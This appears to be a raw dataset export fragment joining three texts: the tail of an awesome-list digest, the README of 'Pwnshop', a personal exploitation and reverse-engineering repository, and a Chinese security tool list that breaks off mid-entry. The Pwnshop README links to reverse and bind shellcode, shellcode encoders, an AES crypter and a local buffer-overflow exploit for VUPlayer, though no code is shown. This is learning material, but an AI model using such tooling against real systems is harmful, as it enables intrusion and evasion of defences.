Language Standards\n\n* [shoco](http://ed-von-schleck.github.io/shoco/) - Compressor for small text strings. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n\n### Testing / Language Standards\n\n* [CHEAT](http://users.jyu.fi/\\~sapekiis/cheat/) - Very simple unit testing framework. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)\n* [CMock](http://www.throwtheswitch.org/) - Mock/stub generator for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n* [Unity](http://www.throwtheswitch.org/) - Simple unit testing framework for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)\n\n### Tools / Language Standards\n\n* [rr](https://rr-project.org/) - Debugger that records non-deterministic executions to allow for deterministic debugging. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)\n\n### Utilities / Language Standards\n\n* [libusb](https://libusb.info/) - Generic access to USB devices. [`LGPL2.1`](https://github.com/libusb/libusb/blob/master/COPYING)\n\n## [7. Awesome Swift](/content/matteocrippa/awesome-swift/README.md)\n\n### Core Data\n\n* [SugarRecord (⭐2.1k)](https://github.com/modo-studio/SugarRecord) - Helps with Core Data and Realm.\n\n### Transition / Barcode\n\n* [EasyTransitions (⭐1.7k)](https://github.com/marcosgriselli/EasyTransitions) - A simple way to create custom interactive UIViewController transitions.\n\n## [8. Awesome PICO 8](/content/pico-8/awesome-PICO-8/README.md)\n\n### Contents / Tools\n\n* [MIDI to PICO-8 (⭐57)](https://github.com/andmatand/midi-to-pico8) - A tool to convert MIDI files to PICO-8 music.\n\n## [9. Awesome Hacking](/content/carpedm20/awesome-hacking/README.md)\n\n### Tools / Other\n\n* [Autopsy](http://www.sleuthkit.org/autopsy/) - A digital forensics platform and graphical interface to [The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/index.php) and other digital forensics tools\n\n### Bug bounty / Other\n\n* [Awesome bug bounty resources by EdOverflow (⭐4.5k)](https://github.com/EdOverflow/bugbounty-cheatsheet)\n\n### General / Other\n\n* [Movies For Hackers (⭐9.3k)](https://github.com/k4m4/movies-for-hackers) - A curated list of movies every hacker & cyberpunk must watch.\n\n---\n\n- Prev: [May 12, 2018](/content/2018/05/12/README.md)\n- Next: [May 10, 2018](/content/2018/05/10/README.md)"}}},{"rowIdx":539,"cells":{"text":{"kind":"string","value":"# Pwnshop\n> Reverse Engineering, Exploitation & Crypto.\n\nCheck out my [blog](http://medium.syscall59.com), follow me on [Twitter](https://twitter.com/syscall59) and [Youtube](https://www.youtube.com/channel/UC2lZwxYDEAgQod3D4JqxLfg)! \n### Support the project : \n\"Buy\n\n## Contents:\n- Reverse engineering a simple crackme called “Just see”: [writeup](https://medium.com/@0x0FFB347/crackme-just-see-c6dda1edb9fb)\n- Reverse engineering a level 1 crackme \"Easy_firstCrackme-by-D4RK_FL0W\": [writeup](https://medium.com/syscall59/reverse-engineering-easy-firstcrackme-by-d4rk-fl0w-73dd4412bca5?source=your_stories_page---------------------------) \n- Utility - Object/Executable file to shellcode converter script: [code](https://github.com/alanvivona/pwnshop/blob/master/utils/obj2shellcode) \n- Utility - Assembly and link script : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/asm-and-link) \n- Utility - Shellcode testing skeleton generator : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/gen-shellcode-test) \n- Utility - GDB python script template : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/gdb-script-template.py) \n- Exit syscall asm: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x00-calling-exit-syscall/0x00-exitSyscall.asm)\n- Write syscall \"Hello world!\": [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x01-calling-write-syscall/0x01-calling-write-syscall.asm)\n- Execve shellcode (dynamic addressing) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x02-execve-dynamic-addressing/0x02-dynamic-addressing.asm)\n- Ret2libc exploit for protostar stack6 challenge : [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x03-system-for-ret2libc/pwn.py)\n- Exploit for protostar stack7 challenge (Smallest ROP chain): [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x04-simplest-rop-ever/roppwn.py)\n- Exploit for VUPlayer 2.49 (no DEP) local buffer overflow: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x07-windows-EDBID-40018-localbof/exploit.js), [writeup](https://medium.com/@0x0FFB347/windows-expliot-dev-101-e5311ac284a)\n- Execve shellcode (stack method) : [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0A-execve-stack/execvestack.nasm) \n- Execve shellcode using RIP relative addressing [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0B-execve-rip-relative-addressing/execve-rip-relative.nasm) \n- Password Protected Bind Shell (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0D-SLAE64-1-tcp-bind-shell-auth/tcp-bind-shell-auth-smaller.nasm), [writeup](https://medium.com/bugbountywriteup/writing-a-password-protected-bind-shell-linux-x64-e052d2f65ff2) \n- Password Protected Reverse Shell (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0E-SLAE64-2-reverse-tcp-auth/reverse-tcp-with-auth.nasm), [writeup](https://medium.com/@0x0FFB347/writing-a-password-protected-reverse-shell-linux-x64-5f4d3a28d91a), [Featured in the 1st number of Paged-Out](https://pagedout.institute/download/PagedOut_001_beta1.pdf) \n- XANAX - A custom shellcode encoder written in assembly : \n - [encoder code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/xanax-encoder.nasm) \n - [encoder on exploit-db](https://www.exploit-db.com/shellcodes/46679) \n - [encoder on packetstormsecurity](https://packetstormsecurity.com/files/152456/Linux-x64-XANAX-Encoder-Shellcode.html)\n - [decoder code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/xanax-decoder.nasm) \n - [decoder on exploit-db](https://www.exploit-db.com/shellcodes/46680) \n - [decoder on packetstormsecurity](https://packetstormsecurity.com/files/152455/Linux-x64-XANAX-Decoder-Shellcode.html)\n - [writeup](https://medium.com/@0x0FFB347/writing-a-custom-shellcode-encoder-31816e767611) \n- A more generic (and somewhat extensible) encoder skeleton written in Go [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/encoder.go) \n- Gocryper : A custom AES shellcode crypter written in Go [code](https://github.com/alanvivona/pwnshop/tree/master/src/0x14-SLAE64-crypter), [writeup](https://medium.com/syscall59/a-trinity-of-shellcode-aes-go-f6cec854f992) \n- A basic Polimorphic Engine written in Go [code](https://github.com/alanvivona/pwnshop/tree/master/src/0x12-SLAE-shellstorm-polymorph), [writeup](https://medium.com/me/stats/post/73ec56a2353e) \n- Egg-hunter shellcode (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0F-SLAE64-3-egghunter/egghunter-V1.nasm), [writeup](https://medium.com/syscall59/on-eggs-and-egg-hunters-linux-x64-305b947f792e) \n- Password Protected Reverse Shell (Linux/ARMv6) \n - [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x15-ARM-shellcode/ARM-reverse-shell-with-auth.s)\n - [writeup](https://medium.com/syscall59/shellcode-for-iot-a-password-protected-reverse-shell-linux-arm-a18fcda4853b)\n - [payload on packetstormsecurity](https://packetstormsecurity.com/files/152602/Linux-ARM-Password-Protected-Reverse-TCP-Shell-Shellcode.html)\n - [payload on exploit-db](https://www.exploit-db.com/shellcodes/46736) \n- MalwareTech's String Challenges crackmes: [writeup](https://medium.com/syscall59/solving-malwaretech-string-challenges-with-some-radare2-magic-98ebd8ff0b88)\n- MalwareTech's Shellcode Challenges crackmes: [writeup](http://medium.syscall59.com/solving-malwaretech-shellcode-challenges-with-some-radare2-magic-b91c85babe4b) \n- DEFCON Qualys 2019 : Speedrun-001 exploit (Stack-based bof + ROP): [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x17-defcon-qualys-2019/speedrun-001-exploit.py)\n- Solution for the crackme \"Crackme2-be-D4RK_FL0W\" [writeup](https://medium.com/syscall59/reverse-engineering-crackme2-be-d4rk-fl0w-walkthrough-ea50b851b5f0) \n- Solution for the crackme \"Crack3-by-D4RK_FL0W\" :\n - Option 1 - Using r2 macros to extract the PIN: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x19-crackme-darkflow-3/r2.commands) \n - Option 2 - Using GEF and unicorn-engine emulation to bruteforce the PIN: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x19-crackme-darkflow-3/emu.py)\n - Blog post exploring both options: [writeup](https://medium.com/syscall59/re-using-macros-emulation-voodo-to-solve-a-crackme-a90566e9c7c9) \n- Utility - r2frida Cheatsheet: [writeup](https://github.com/alanvivona/pwnshop/blob/master/utils/r2frida-cheatsheet.md) \n- Solution for the crackme \"alien_bin\" [writeup](https://medium.com/syscall59/reverse-engineering-cracking-alien-technology-7acddcb561b) \n- Automated solutions for the crackme \"mexican\": [writeup](https://medium.com/syscall59/solved-solving-mexican-crackme-82d71a28e189), [script solution 1: carving](https://github.com/alanvivona/pwnshop/blob/master/src/0x1A/s1-static-extract-from-code.py), [script solution 2: patching](https://github.com/alanvivona/pwnshop/blob/master/src/0x1A/s2-binary-patching.py) \n- Writeup for the crackme \"crackme_by_coulomb\" (.net): [writeup](https://medium.com/syscall59/reverse-engineering-solving-my-first-net-crackme-dacf2e59ad3b) \n- Writeup for the crackme \"shadows_registerme\" (.net): [writeup](https://medium.com/syscall59/reverse-engineering-and-cracking-a-net-binary-using-dnspy-4b88c692a6ff) \n- Writeup for the crackme \"removemytrial_by_coulomb\" (.net): [writeup](https://medium.com/bugbountywriteup/reverse-engineering-beating-a-trial-on-a-net-crackme-d4ab6604f10b) \n- Writeup for the crackme \"Get The Password\": [writeup](https://medium.com/bugbountywriteup/writing-a-keygen-using-python-itertools-1944cbb4d07c), [code (keygen)](https://github.com/alanvivona/pwnshop/blob/master/src/0x1C-HN1-Crackme1-GetThePassword/solve.py) \n\n- Cyptopals Solutions: Set 1, Challenge 1. \"Convert hex to base64\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1D-cryptopals-se1-ch1/) \n- Cyptopals Solutions: Set 1, Challenge 2. \"Fixed XOR\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1E-cryptopals-se1-ch2/) \n- Cyptopals Solutions: Set 1, Challenge 3. \"Single-byte XOR cipher\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1F-cryptopals-se1-ch3/) \n- Cyptopals Solutions: Set 1, Challenge 4. \"Detect single-character XOR\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x20-cryptopals-se1-ch4/) \n- Cyptopals Solutions: Set 1, Challenge 5. \"Implement repeating-key XOR\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x21-cryptopals-se1-ch5/) \n- Cyptopals Solutions: Set 1, Challenge 6. \"Break repeating-key XOR\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x22-cryptopals-se1-ch6/) \n- Cyptopals Solutions: Set 1, Challenge 7. \"AES in ECB mode\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x23-cryptopals-se1-ch7/) \n- Cyptopals Solutions: Set 1, Challenge 8. \"Detect AES in ECB mode\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x24-cryptopals-se1-ch8/) \n- Cyptopals Solutions: Set 2, Challenge 9. \"Implement PKCS#7 padding\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x25-cryptopals-se2-ch9/) \n- Cyptopals Solutions: Set 2, Challenge 15. \"PKCS#7 padding validation\":\n[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x26-cryptopals-se2-ch15/) \n\n## Useful links:\n\n### Tools:\nA non-exhaustive list of tools \n- [radare2](https://rada.re) (+[Cutter](https://github.com/radareorg/cutter) +[r2frida](https://github.com/nowsecure/r2frida) +[r2pipe](https://github.com/radare/radare2-r2pipe) +[r2ghidra-dec](https://github.com/radareorg/r2ghidra-dec))\n- [Ghidra](https://ghidra-sre.org/)\n- [x64dbg](https://x64dbg.com)\n- [Frida](https://www.frida.re/)\n- [gdb](https://www.gnu.org/software/gdb/) (+[gdb-dashboard](https://github.com/cyrus-and/gdb-dashboard) +[GEF](https://github.com/hugsy/gef))\n- [Valgrind](http://www.valgrind.org/)\n- [Pwntools](http://pwntools.com)\n- [Wireshark](https://www.wireshark.org/)\n- [Binwalk](https://github.com/ReFirmLabs/binwalk)\n- strace\n- ltrace\n- hexdump\n- xxd\n- [rappel](https://github.com/yrp604/rappel)\n- nasm\n- gas\n- [Unicorn Engine](https://www.unicorn-engine.org/)\n- [IDA](https://www.hex-rays.com/products/ida/index.shtml) \n- hexedit \n- bless \n- Metasploit (https://www.metasploit.com/) \n\n\n\n### Resources:\nThere's a **LOT** of stuff out there. These are just the most useful things I've found so far. \n- :computer: [Live overflow](https://liveoverflow.com/)\n- :book: [The shellcoder's handbook](https://amzn.to/2LXi0KH)\n- :computer: [Exploit education](https://exploit.education/)\n- :computer: [Gynvael coldwind](https://gynvael.coldwind.pl/)\n- :computer: [Azeria labs](https://azeria-labs.com/)\n- :computer: [Phrack](http://phrack.org/)\n- :computer: [Corelan](https://www.corelan.be/index.php/articles/)\n- :computer: [Fuzzysecurity](https://www.fuzzysecurity.com/index.html)\n- :computer: [Packetstormsecurity](https://packetstormsecurity.com/)\n- :computer: [Exploitdb](https://www.exploit-db.com/)\n- :book: [Beginners RE](https://beginners.re/)\n- :book: [Practical reverse engineering](https://amzn.to/35lKNQy)\n- :book: [Programming linux anti-reversing techniques](https://leanpub.com/anti-reverse-engineering-linux)\n- :book: [Attacking network protocols](https://amzn.to/35jFO2S)\n- :book: [Penetration testing: A Hands-On introduction to hacking](https://amzn.to/2IzzlHy)\n- :computer: [Malware Unicorn](https://malwareunicorn.org/#/workshops) \n- :book: [Radare2 Book](https://radare.gitbooks.io/radare2book/) \n- :computer: [Paged-Out!](https://pagedout.institute) \n- :book: [PoC||GTFO I](https://amzn.to/2MDgz3l) \n- :book: [PoC||GTFO II](https://amzn.to/2AS4uBP) \n- :book: [The IDA Pro Book](https://amzn.to/2LXnKUE) \n- :book: [Hacker Disassembling Uncovered](https://amzn.to/2nLew4I) \n- :computer: [Reverse Engineering Stackexchange](https://reverseengineering.stackexchange.com/) \n- :computer: [Cryptopals Challenges](https://cryptopals.com/) \n- :book: [Cryptool Book](https://www.cryptool.org/images/ctp/documents/CT-Book-en.pdf) \n- :book: [Crypto 101](https://github.com/crypto101/crypto101.github.io/raw/master/Crypto101.pdf) \n- :book: [Cracking Codes With Python](http://inventwithpython.com/cracking/) \n"}}},{"rowIdx":540,"cells":{"text":{"kind":"string","value":"# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos)\n\n\n\n\n# 说明\n- [English Version](https://github.com/alphaSeclab/sec-tool-list/blob/master/Readme_en.md)\n- 因Github Readme显示行数有限, 当前页面显示的为不完整版, 只显示了星数最高的前1000个工具. [点击查看完整版](https://github.com/alphaSeclab/sec-tool-list/blob/master/Readme_full.md)\n\n\n# 工具列表\n- [**70102**星][10d] [JS] [trekhleb/javascript-algorithms](https://github.com/trekhleb/javascript-algorithms) JavaScript算法和数据结构\n- [**66889**星][3m] [Py] [thealgorithms/python](https://github.com/thealgorithms/python) Python实现的所有算法\n- [**61315**星][10d] [JS] [puppeteer/puppeteer](https://github.com/puppeteer/puppeteer) Headless Chrome Node.js API\n- [**49304**星][10d] [C#] [shadowsocks/shadowsocks-windows](https://github.com/shadowsocks/shadowsocks-windows) Shadowsocks的Windows客户端\n- [**37096**星][10d] [Py] [scrapy/scrapy](https://github.com/scrapy/scrapy) Web爬虫框架\n- [**35937**星][10d] [Py] [minimaxir/big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) “淘气”的字符串列表,当作为用户输入时很容易引发问题\n- [**35780**星][10d] [Go] [fatedier/frp](https://github.com/fatedier/frp) 快速的反向代理, 将NAT或防火墙之后的本地服务器暴露到公网\n- [**35435**星][8m] [hack-with-github/awesome-hacking](https://github.com/hack-with-github/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers\n- [**35073**星][7d] [C++] [x64dbg/x64dbg](https://github.com/x64dbg/x64dbg) Windows平台x32/x64调试器\n- [**32627**星][10d] [Py] [shadowsocks/shadowsocks](https://github.com/shadowsocks/shadowsocks) shadowsocks原版\n- [**32301**星][10d] [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.\n- [**31373**星][7d] [Go] [v2ray/v2ray-core](https://github.com/v2ray/v2ray-core) A platform for building proxies to bypass network restrictions.\n- [**29641**星][10d] [Kotlin] [shadowsocks/shadowsocks-android](https://github.com/shadowsocks/shadowsocks-android) A shadowsocks client for Android\n- [**28802**星][2m] [JS] [algorithm-visualizer/algorithm-visualizer](https://github.com/algorithm-visualizer/algorithm-visualizer) an interactive online platform that visualizes algorithms from code.\n- [**26685**星][10d] [Py] [certbot/certbot](https://github.com/certbot/certbot) Certbot is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server. It can also act as a client for any other CA that uses the ACME protocol.\n- [**26685**星][10d] [Py] [certbot/certbot](https://github.com/certbot/certbot) 从Let's Encrypt获得证书,并(可选地)在服务器上自动启用HTTPS。它还可以充当使用ACME协议的任何其他CA的客户端\n- [**26594**星][1y] [Py] [imhuay/algorithm_interview_notes-chinese](https://github.com/imhuay/algorithm_interview_notes-chinese) 2018/2019/校招/春招/秋招/算法/机器学习(Machine Learning)/深度学习(Deep Learning)/自然语言处理(NLP)/C/C++/Python/面试笔记\n- [**26576**星][6m] [Swift] [shadowsocks/shadowsocksx-ng](https://github.com/shadowsocks/shadowsocksx-ng) Next Generation of ShadowsocksX\n- [**26238**星][10d] [xitu/gold-miner](https://github.com/xitu/gold-miner) 翻译优质互联网技术文章的社区\n- [**24073**星][10d] [Go] [filosottile/mkcert](https://github.com/filosottile/mkcert) 一个简单的零配置工具,可以使用任何名称创建本地受信任的开发证书\n- [**23690**星][10d] [alvin9999/new-pac](https://github.com/alvin9999/new-pac) 科学上网/自由上网/翻墙/软件/方法,免费shadowsocks/ss/ssr/v2ray/goflyway账号,vps一键搭建脚本/教程\n- [**22908**星][4m] [PHP] [danielmiessler/seclists](https://github.com/danielmiessler/seclists) 多种类型资源收集:用户名、密码、URL、敏感数据类型、Fuzzing Payload、WebShell等\n- [**22862**星][10d] [Swift] [raywenderlich/swift-algorithm-club](https://github.com/raywenderlich/swift-algorithm-club) 算法和数据结构,Swift版,带解释\n- [**22521**星][10d] [Rust] [alacritty/alacritty](https://github.com/alacritty/alacritty) A cross-platform, GPU-accelerated terminal emulator\n- [**22161**星][10d] [Java] [skylot/jadx](https://github.com/skylot/jadx) dex 转 java 的反编译器\n- [**21446**星][3m] [Java] [thealgorithms/java](https://github.com/thealgorithms/java) Java实现的所有算法\n- [**21055**星][10d] [Java] [alibaba/arthas](https://github.com/alibaba/arthas) Alibaba Java诊断利器Arthas\n- [**21039**星][10d] [Shell] [streisandeffect/streisand](https://github.com/StreisandEffect/streisand) Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.\n- [**20823**星][10d] [C++] [cmderdev/cmder](https://github.com/cmderdev/cmder) Lovely console emulator package for Windows\n- [**20797**星][10d] [Java] [nationalsecurityagency/ghidra](https://github.com/nationalsecurityagency/ghidra) 软件逆向框架\n- [**20360**星][3m] [Jupyter Notebook] [camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers](https://github.com/camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers) An introduction to Bayesian methods + probabilistic programming with a computation/understanding-first, mathematics-second point of view. All in pure Python ;)\n- [**19944**星][10d] [Haskell] [koalaman/shellcheck](https://github.com/koalaman/shellcheck) bash/sh脚本静态检测工具, 给出警告和建议\n- [**19824**星][10d] [Py] [donnemartin/interactive-coding-challenges](https://github.com/donnemartin/interactive-coding-challenges) 120+ interactive Python coding interview challenges (algorithms and data structures). Includes Anki flashcards.\n- [**19635**星][10d] [TS] [railsware/upterm](https://github.com/railsware/upterm) A terminal emulator for the 21st century.\n- [**19574**星][4m] [Ruby] [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework) Metasploit Framework\n- [**19324**星][10d] [Vue] [liyasthomas/postwoman](https://github.com/liyasthomas/postwoman) Web 请求构建工具(相当于Postman)\n- [**19002**星][10d] [fallibleinc/security-guide-for-developers](https://github.com/fallibleinc/security-guide-for-developers) Security Guide for Developers (实用性开发人员安全须知)\n- [**18747**星][10d] [Py] [mitmproxy/mitmproxy](https://github.com/mitmproxy/mitmproxy) An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.\n- [**18582**星][10d] [Go] [inconshreveable/ngrok](https://github.com/inconshreveable/ngrok) 反向代理,在公网终端和本地服务之间创建安全的隧道\n- [**18223**星][10d] [Py] [trailofbits/algo](https://github.com/trailofbits/algo) Ansible 脚本(基于Python),简化配置私人 IPSEC VPN 的过程,默认使用最安全的配置,支持常见云提供商,并且大多数设备都不需要客户端\n- [**17366**星][7d] [Py] [corentinj/real-time-voice-cloning](https://github.com/corentinj/real-time-voice-cloning) Clone a voice in 5 seconds to generate arbitrary speech in real-time\n- [**17309**星][10d] [Py] [keon/algorithms](https://github.com/keon/algorithms) Python数据结构和算法示例\n- [**17131**星][10d] [Py] [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) 自动SQL注入和数据库接管工具\n- [**17119**星][10d] [C] [curl/curl](https://github.com/curl/curl) 命令行工具和库,使用URL语法传输数据,支持HTTP,HTTPS,FTP,FTPS,GOPHER,TFTP,SCP,SFTP,SMB,TELNET,DICT,LDAP,LDAPS,FILE,IMAP,SMTP,POP3,RTSP和RTMP。libcurl提供了许多强大的功能\n- [**16898**星][10d] [C] [bannedbook/fanqiang](https://github.com/bannedbook/fanqiang) 翻墙-科学上网\n- [**16311**星][10d] [gfwlist/gfwlist](https://github.com/gfwlist/gfwlist) gfwlist\n- [**15960**星][3m] [micropoor/micro8](https://github.com/micropoor/micro8) 从业10年渗透笔记\n- [**15811**星][10d] [Py] [drduh/macos-security-and-privacy-guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide) Guide to securing and improving privacy on macOS\n- [**15415**星][7m] [Py] [eriklindernoren/ml-from-scratch](https://github.com/eriklindernoren/ml-from-scratch) Machine Learning From Scratch. Bare bones NumPy implementations of machine learning models and algorithms with a focus on accessibility. Aims to cover everything from linear regression to deep learning.\n- [**15003**星][10d] [Java] [tencent/tinker](https://github.com/tencent/tinker) 一个针对Android的热修复解决方案库,它支持dex、库和资源更新,无需重新安装apk\n- [**14431**星][10d] [C#] [0xd4d/dnspy](https://github.com/0xd4d/dnspy) .NET调试器和汇编编辑器\n- [**14062**星][6m] [Py] [binux/pyspider](https://github.com/binux/pyspider) Python网络爬虫系统\n- [**13549**星][10d] [Shell] [hwdsl2/setup-ipsec-vpn](https://github.com/hwdsl2/setup-ipsec-vpn) Scripts to build your own IPsec VPN server, with IPsec/L2TP and Cisco IPsec on Ubuntu, Debian and CentOS\n- [**13544**星][10d] [getlantern/download](https://github.com/getlantern/download) Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由 proxy vpn circumvention gfw\n- [**13193**星][3m] [Py] [cool-rr/pysnooper](https://github.com/cool-rr/pysnooper) Never use print for debugging again\n- [**13072**星][7d] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android.\n- [**13063**星][10d] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android.\n- [**13030**星][4m] [C] [shadowsocks/shadowsocks-libev](https://github.com/shadowsocks/shadowsocks-libev) libev port of shadowsocks\n- [**12973**星][10d] [facert/awesome-spider](https://github.com/facert/awesome-spider) 爬虫集合\n- [**12948**星][10d] [C] [openssl/openssl](https://github.com/openssl/openssl) TLS/SSL and crypto library\n- [**12802**星][10d] [JS] [gitsquared/edex-ui](https://github.com/gitsquared/edex-ui) A cross-platform, customizable science fiction terminal emulator with advanced monitoring & touchscreen support.\n- [**12754**星][10d] [Go] [buger/goreplay](https://github.com/buger/goreplay) 实时捕获HTTP流量并输入测试环境,以便持续使用真实数据测试你的系统\n- [**12689**星][7d] [ruanyf/weekly](https://github.com/ruanyf/weekly) 科技爱好者周刊,每周五发布\n- [**12561**星][10d] [QML] [swordfish90/cool-retro-term](https://github.com/swordfish90/cool-retro-term) A good looking terminal emulator which mimics the old cathode display...\n- [**12481**星][10d] [C] [radareorg/radare2](https://github.com/radareorg/radare2) UNIX-like reverse engineering framework and command-line toolset\n- [**12456**星][10d] [Java] [oracle/graal](https://github.com/oracle/graal) Run Programs Faster Anywhere\n- [**12414**星][11d] [Ruby] [diaspora/diaspora](https://github.com/diaspora/diaspora) A privacy-aware, distributed, open source social network.\n- [**12244**星][4m] [Py] [swisskyrepo/payloadsallthethings](https://github.com/swisskyrepo/payloadsallthethings) A list of useful payloads and bypass for Web Application Security and Pentest/CTF\n- [**12083**星][10d] [Go] [ehang-io/nps](https://github.com/ehang-io/nps) 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.\n- [**12036**星][10d] [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) 渗透测试资源/工具集\n- [**12020**星][10d] [C++] [opengenus/cosmos](https://github.com/opengenus/cosmos) Algorithms that run our universe | Your personal library of every algorithm and data structure code that you will ever encounter | Ask us anything at our forum |\n- [**12002**星][4m] [Py] [owasp/cheatsheetseries](https://github.com/owasp/cheatsheetseries) The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.\n- [**11999**星][7d] [C] [facebook/zstd](https://github.com/facebook/zstd) 快速实时压缩算法\n- [**11865**星][8m] [C] [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) 世界上最快的互联网端口扫描器,号称可6分钟内扫描整个互联网\n- [**11814**星][10d] [Go] [xtaci/kcptun](https://github.com/xtaci/kcptun) A Stable & Secure Tunnel based on KCP with N:M multiplexing and FEC. Available for ARM, MIPS, 386 and AMD64\n- [**11782**星][7d] [Shell] [233boy/v2ray](https://github.com/233boy/v2ray) 最好用的 V2Ray 一键安装脚本 & 管理脚本\n- [**11728**星][10d] [Go] [goharbor/harbor](https://github.com/goharbor/harbor) 可信云本地注册表项目,用于存储、签名和扫描内容\n- [**11516**星][10d] [Shell] [nyr/openvpn-install](https://github.com/nyr/openvpn-install) OpenVPN安装:Ubuntu, Debian, CentOS和Fedora\n- [**11427**星][10d] [Go] [txthinking/brook](https://github.com/txthinking/brook) Go语言编写的跨平台代理\n- [**11265**星][10d] [CSS] [hacker0x01/hacker101](https://github.com/hacker0x01/hacker101) Source code for Hacker101.com - a free online web and mobile security class.\n- [**11183**星][10d] [Java] [konloch/bytecode-viewer](https://github.com/konloch/bytecode-viewer) 一个Java 8+ Jar和Android APK逆向工程套件(反编译器、编辑器、调试器和更多)\n- [**11135**星][10d] [JS] [http-party/node-http-proxy](https://github.com/http-party/node-http-proxy) 支持websocket的HTTP可编程代理库\n- [**11094**星][10d] [C++] [trojan-gfw/trojan](https://github.com/trojan-gfw/trojan) 一个不可识别的机制,帮助您绕过GFW。\n- [**11075**星][5m] [ObjC] [flipboard/flex](https://github.com/flipboard/flex) 一个用于iOS的应用内调试和探索工具\n- [**11059**星][2y] [ObjC] [bang590/jspatch](https://github.com/bang590/jspatch) 使用Objective-C运行时桥接Objective-C和Javascript。可以在JavaScript中调用任何Objective-C类和方法,只需要包含一个小引擎。通常用于修复iOS应用\n- [**10931**星][3y] [CoffeeScript] [dropbox/zxcvbn](https://github.com/dropbox/zxcvbn) 低预算的密码强度估计\n- [**10845**星][10d] [Go] [gocolly/colly](https://github.com/gocolly/colly) Go编写的爬虫框架\n- [**10755**星][10d] [Ruby] [rubocop-hq/rubocop](https://github.com/rubocop-hq/rubocop) A Ruby static code analyzer and formatter, based on the community Ruby style guide.\n- [**10603**星][7d] [JS] [matt-esch/virtual-dom](https://github.com/matt-esch/virtual-dom) 一个虚拟的DOM比较算法\n- [**10564**星][3m] [Go] [ehang-io/nps](https://github.com/ehang-io/nps) 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.\n- [**10532**星][10d] [JS] [valve/fingerprintjs2](https://github.com/valve/fingerprintjs2) 浏览器指纹识别库\n- [**10448**星][3m] [C++] [microsoft/lightgbm](https://github.com/microsoft/lightgbm) 一种基于决策树算法的快速、分布式、高性能梯度增强(GBT、GBDT、GBRT、GBM或MART)框架,用于排序、分类等多种机器学习任务。\n- [**10267**星][4m] [Py] [sherlock-project/sherlock](https://github.com/sherlock-project/sherlock) 在不同的社交网站下查找用户名\n- [**10266**星][3m] [C++] [valvesoftware/proton](https://github.com/valvesoftware/proton) 基于Wine和其他组件运行Steam Play\n- [**10156**星][11d] [Py] [apachecn/awesome-algorithm](https://github.com/apachecn/awesome-algorithm) 项目永久冻结,迁移至新地址:\n- [**10040**星][10d] 